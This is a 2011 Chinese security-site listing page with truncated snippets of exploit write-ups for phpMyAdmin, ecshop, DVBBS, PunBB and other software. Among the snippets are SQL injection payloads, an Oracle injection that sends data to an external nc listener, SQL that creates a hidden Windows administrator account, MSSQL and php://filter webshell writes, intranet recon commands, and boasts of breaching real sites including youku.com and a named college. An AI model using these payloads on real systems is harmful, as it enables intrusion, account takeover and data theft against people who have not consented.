Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

绿色网站无广告
搜索:
您的位置: Linux安全网 > Linux安全 >
  • Linux安全# phpMyAdmin setup脚本远程跨站脚本漏洞
  • 日期:2011-07-22 点击:204分类: 漏洞EXP - 跨站XSS , 作者: Tenable Network Security , 受影响系统: phpmyadmin phpMyAdmin 3.x 不受影响系统: phpMyAdmin phpMyAdmin 3.3.7 描述: CVE ID: CVE-2010-3263 phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdmin的setu
  • Linux安全# 中易广告联盟系统(ZYADS) 漏洞
  • 日期:2011-07-22 点击:205作者:q1ur3n 中易广告联盟系统(ZYADS) sql注入和本地包含漏洞解析 在index/news. php 1-31行 ? include_once ( top.php ); $newsid = intval ( $_GET [ 'id' ]); $to_type = addslashes ( $_GET [ 'type' ]); if ( $to_type == 'index' ) { $to_type_s = an
  • Linux安全# 动网论坛dispbbs.php页面SQL注入漏洞
  • 日期:2011-07-22 点击:202受影响系统: 动网论坛 Dvbbs php 2.0++ 描述: DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序。 在DVBBS的dispbbs.php文件中: if( $board_settings[55] != 0 $TopicInfo['locktopic'] == 0 dateDiff('d',$TopicInfo['dateandtime'],TIME_NOW)
  • Linux安全# 0day发布网址
  • 日期:2011-07-22 点击:211http://www.frsirt.com http://www.dswlab.com http://www.derkeiler.com http://www.h4cky0u.org http://www.security.nnov.ru/ http://governmentsecurity.org/ http://pforum.pccenter.com.tw/ http://www.swerat.com/forums/index.php http://chasenet.o
  • Linux安全# PunBB官方上传附件扩展注射漏洞
  • 日期:2011-07-22 点击:200PunBB官方上传附件扩展注射漏洞 作者:Ryat if (isset( $_GET [ 'secure_str' ])) { if (preg_match( '~(\d+)f(\d+)~' , $_GET [ 'secure_str' ], $match )) { ... 'WHERE' = 'a.id=' . $attach_item . 'AND(fp.read_forumISNULLORfp.read_forum=1)ANDsecure_
  • Linux安全# 0day发布网址2
  • 日期:2011-07-22 点击:212国外安全 http://www.neohapsis.com/ 内容极为丰富 国外安全 http://www.deadly.org/ 大量关于OpenBSD的资料文档教程 国外安全 http://www.guninski.com/ 安全专家Guninski的主页,有大量由系统漏洞 国外安全 http://www.sysinternals.com 有很好的windows下
  • Linux安全# ecshop v2.72 前台写shell漏洞
  • 日期:2011-07-22 点击:213titleecshop v2.72 前台写shell漏洞 by:xhm1n9/title form method=post name=register action= http://127.1/ecshop2.72/demo/index.php h3ecshop v2.72 前台写shell漏洞/h3br利用方试:提交两次,第二次内容任意/br input type=text name=lang size=80 valu
  • Linux安全# 友情检测 安徽新闻出版学院网站
  • 日期:2011-07-22 点击:197xiaowei'blog www.xiaoweio.cn 整站php可暴路径,有内部论坛,不开放, 扫了下目录,在一个灰常灰常隐秘的地方 ,找到站中站,合肥保密局,雷池系统, 合肥的学校好奇怪就像26中里面是合肥地震局一样 呵呵。。。 进后台会记录IP 直接上传,打了补丁!直接突破,拿下
  • Linux安全# Oracle注射技术——Oracle+nc注射
  • 日期:2011-07-22 点击:201首先外网nc监听对应的端口 and UTL_HTTP.request(外网ip:port/(sql语句))=1-- 爆库: select owner from all_tables where rownum=1 select owner from all_tables where owner第一个库名--IWMS_AD_BEGIN-- --IWMS_AD_END-- and rownum=1 select owner from
  • Linux安全# 绕过PHP网站Access Denied
  • 日期:2011-07-22 点击:205register_globals = On ?php $sqlcontent = ?PHP exit(''Access Denied''); ?.$p.\n; file_put_contents($logfile, $sqlcontent); ? exp-demo.php?logfile=php://filter/write=convert.base64-decode/resource=abc.phpp=aPD9waHAgcGhwaW5mbygpOy8vPz4= http:
  • Linux安全# MySQL中英文添加用户到启动
  • 日期:2011-07-22 点击:196insert into a values (set wshshell=createobject (wscript.shell) ); insert into a values (a=wshshell.run (cmd.exe /c net user test 123!@#abcABC /add,0) ); insert into a values (b=wshshell.run (cmd.exe /c net localgroup administrators test /
  • Linux安全# SQL无建表注入
  • 日期:2011-07-22 点击:196上次看到一篇文章MSSQL注入PUBLIC权限下的xp_dirtree再度利用 启发了我一些思路,难道利用XP_Dirtree非要建表权限?为什么不可以利用一些别人已经建立好的表呢 这里只讨论可以利用工具的情况下,下面说一下我的思路步聚(已经实现) 找到一个可以猜表的注入点,先
  • Linux安全# 简单内网渗透刺探命令
  • 日期:2011-07-22 点击:2121.ipconfig /all //可以查看到当前网卡配置信息,包括所属域以及IP段 这个命令可以看到:主机名字---shwdm,IP--192.168.103.8,网关IP---192.168.103.10,DNS 域名解析地址IP---192.168.100.1,主WINS服务器IP---10.0.22.5 2.net view //显示正由指定的计算
  • Linux安全# 各种数据库SQL注入
  • 日期:2011-07-22 点击:198很久没有出来做show了~首先深度鄙视一下BH09讲mysql注射的那个挫人!在中国这些算是科普的东西,居然还能拿去bh讲 现在天朝的工作者们哪个不会用into outfile导出shell哇!老外真是老外,不好好研究研究中华文化,感觉有点井底蛙. superhei jx他们在N年前都已经把
  • Linux安全# youku iphone频道存在注入
  • 日期:2011-07-22 点击:207http://iphone.youku.com/video.php?ch=1id=18751916 and 1=2 union select 1,2,user(),4,5,6,7,8,9,10,11/* 真没想到youku存在这么样的问题,权限还不小,能读到文件,看来安全还是从小处着手啊: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbi
  • Linux安全# 利用sp_oacreate和FSO,得到路径的时候写马
  • 日期:2011-07-22 点击:198以下是命令: declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\Inetpub\tianhong\2.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '%exec
  • Linux安全# Ghost 安装器 1.2.3.8 单文件 绿色版
  • 日期:2011-07-22 点击:200本软件特别适合于喜欢调试系统的朋友,Win7出来了,但其庞大的体积需要DVD光碟才能容纳,刻了又怕浪费!这个软件可以轻松让你在程序在Windows下安装Ghost系统镜像,不用刻碟,不用启动盘,不用设置BIOS,支持NTFS,支持Vista,支持SATA硬盘。程序基于Ghost 1
  • Linux安全# 谷歌推安全扫描器Skipfish 可扫Web程序漏洞
  • 日期:2011-07-22 点击:2093月24日国际报道 Google新发布的开源网络安全扫描器Skipfish,是特别针对网络应用程序的安全漏洞。 Google开发者Michal Zalewski在Skipfish wiki表示,这项工具可扫瞄网络应用程序是否含有一些难以处理的状况,如Blind SQL插入式攻击,或XML远端程序注入等瑕
  • Linux安全# LFI通过proc/self/environ直接获取webshell
  • 日期:2011-07-22 点击:211这篇文章算不上什么原创,今天无聊跑到milw0rm看到的,原文:http://www.milw0rm.com/papers/361 给朋友看了下说看不懂,就来个汉语翻译.呵呵,别见笑.讲的是如何通过注入的恶意代码在proc/self/environ获取到网站的webshell.其原理在文章后面我会告诉大家 第一步
  • Linux安全# 病毒网络攻击基础知识
  • 日期:2011-07-22 点击:198一、什么是计算机病毒 计算机病毒不同于生物医学上的病毒,计算机病毒是指编制或者在计算机 程序 中插入的破坏计算机 功能 或者毁坏 数据 ,影响计算机使用并能自我复制的一组计算机指令或者程序 代码 。由于它的所做所为与生物病毒很相像,人们才给它起了这
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史